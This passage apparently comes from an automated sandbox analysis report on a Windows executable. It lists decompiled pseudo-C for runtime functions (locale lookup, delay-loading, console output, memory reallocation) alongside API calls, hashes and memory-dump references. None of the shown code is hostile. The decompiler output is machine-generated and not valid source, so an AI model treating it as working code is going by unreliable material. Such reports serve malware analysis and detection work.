                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                            • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}










                                                            0x00423022
                                                            0x00423025
                                                            0x00423028
                                                            0x0042302d
                                                            0x0042302e
                                                            0x00423033
                                                            0x00423036
                                                            0x00423049
                                                            0x00423050
                                                            0x00423063
                                                            0x004230b8
                                                            0x004230c5
                                                            0x004230ce
                                                            0x004230ce
                                                            0x00423065
                                                            0x00423080
                                                            0x0042308d
                                                            0x00423096
                                                            0x00423096
                                                            0x00423080
                                                            0x004230de
                                                            0x004230e9
                                                            0x004230f4
                                                            0x004230f4
                                                            0x00423052
                                                            0x00423052
                                                            0x00423054
                                                            0x004230fa
                                                            0x004230fd
                                                            0x00423100
                                                            0x00423108
                                                            0x00423115

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                            • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                            0x0040d22c
                                                            0x0040d232
                                                            0x0040d234
                                                            0x0040d237
                                                            0x0040d244
                                                            0x0040d251
                                                            0x0040d25e
                                                            0x0040d26b
                                                            0x0040d278
                                                            0x0040d285
                                                            0x0040d28e
                                                            0x0040d29c
                                                            0x0040d29e
                                                            0x0040d29f
                                                            0x0040d2a5
                                                            0x0040d2ab
                                                            0x0040d2b2
                                                            0x0040d2b4
                                                            0x0040d2ba
                                                            0x0040d2c0
                                                            0x0040d2d0
                                                            0x00000000
                                                            0x0040d2d5
                                                            0x0040d2e2
                                                            0x0040d2e7
                                                            0x0040d2e9
                                                            0x0040d2eb
                                                            0x0040d2eb
                                                            0x0040d2f1
                                                            0x0040d2f4
                                                            0x0040d2fc
                                                            0x0040d306
                                                            0x0040d309
                                                            0x0040d30e
                                                            0x0040d329
                                                            0x0040d310
                                                            0x0040d31c
                                                            0x0040d31c
                                                            0x0040d32c
                                                            0x0040d335
                                                            0x0040d34e
                                                            0x0040d350
                                                            0x0040d412
                                                            0x0040d412
                                                            0x0040d41c
                                                            0x0040d42a
                                                            0x0040d42a
                                                            0x0040d42e
                                                            0x0040d47b
                                                            0x0040d47d
                                                            0x0040d484
                                                            0x0040d48e
                                                            0x0040d49c
                                                            0x0040d49c
                                                            0x0040d4a0
                                                            0x0040d4a2
                                                            0x0040d4a7
                                                            0x0040d4ad
                                                            0x0040d4bd
                                                            0x0040d4c2
                                                            0x0040d4c2
                                                            0x0040d4a0
                                                            0x00000000
                                                            0x0040d430
                                                            0x0040d434
                                                            0x0040d46f
                                                            0x0040d479
                                                            0x00000000
                                                            0x0040d43c
                                                            0x0040d43f
                                                            0x0040d447
                                                            0x00000000
                                                            0x0040d460
                                                            0x0040d466
                                                            0x0040d46b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040d4c5
                                                            0x0040d4c8
                                                            0x00000000
                                                            0x0040d4c8
                                                            0x0040d447
                                                            0x0040d434
                                                            0x0040d42e
                                                            0x0040d35d
                                                            0x0040d36b
                                                            0x0040d36b
                                                            0x0040d36f
                                                            0x0040d37a
                                                            0x0040d37a
                                                            0x0040d37e
                                                            0x0040d3cb
                                                            0x0040d3d7
                                                            0x0040d40d
                                                            0x0040d3d9
                                                            0x0040d3dd
                                                            0x0040d3e3
                                                            0x0040d3e8
                                                            0x0040d3ed
                                                            0x0040d3f4
                                                            0x0040d3fa
                                                            0x0040d3ff
                                                            0x0040d404
                                                            0x0040d404
                                                            0x0040d3ed
                                                            0x0040d3dd
                                                            0x00000000
                                                            0x0040d380
                                                            0x0040d385
                                                            0x0040d38f
                                                            0x0040d39d
                                                            0x0040d39d
                                                            0x0040d3a1
                                                            0x00000000
                                                            0x0040d3a3
                                                            0x0040d3a3
                                                            0x0040d3a8
                                                            0x0040d3ae
                                                            0x0040d3be
                                                            0x00000000
                                                            0x0040d3c3
                                                            0x0040d3a1
                                                            0x0040d337
                                                            0x0040d343
                                                            0x0040d347
                                                            0x00000000
                                                            0x0040d349
                                                            0x0040d4ca
                                                            0x0040d4d1
                                                            0x0040d4d5
                                                            0x0040d4d8
                                                            0x0040d4db
                                                            0x0040d4e4
                                                            0x0040d4e4
                                                            0x00000000
                                                            0x0040d4ea
                                                            0x0040d347

                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                            • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                            0x004047b0
                                                            0x004047b3
                                                            0x004047b5
                                                            0x004047be
                                                            0x00404821
                                                            0x00404826
                                                            0x00404827
                                                            0x00404828
                                                            0x0040482a
                                                            0x004047c0
                                                            0x004047c9
                                                            0x004047d8
                                                            0x004047e4
                                                            0x004047e9
                                                            0x004047ef
                                                            0x004047fd
                                                            0x0040480b
                                                            0x0040481a
                                                            0x0040481a
                                                            0x00404832

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                            • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: 9@
                                                            • API String ID: 3320372497-3209974744
                                                            • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                            • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 62%
                                                            			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}
















                                                            0x0041f0fd
                                                            0x0041f0fe
                                                            0x0041f101
                                                            0x0041f106
                                                            0x0041f107
                                                            0x0041f10c
                                                            0x0041f10f
                                                            0x0041f122
                                                            0x0041f124
                                                            0x0041f12c
                                                            0x0041f1ca
                                                            0x0041f1cf
                                                            0x0041f1de
                                                            0x0041f1f8
                                                            0x0041f132
                                                            0x0041f132
                                                            0x0041f13c
                                                            0x0041f15a
                                                            0x0041f15c
                                                            0x0041f16b
                                                            0x0041f188
                                                            0x0041f1a0
                                                            0x0041f1ba
                                                            0x0041f1ba
                                                            0x0041f1ff
                                                            0x0041f202
                                                            0x0041f205
                                                            0x0041f20d
                                                            0x0041f218

                                                            APIs
                                                              • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                              • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                            • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                            • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                            • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                            • String ID:
                                                            • API String ID: 135118572-0
                                                            • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                            • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
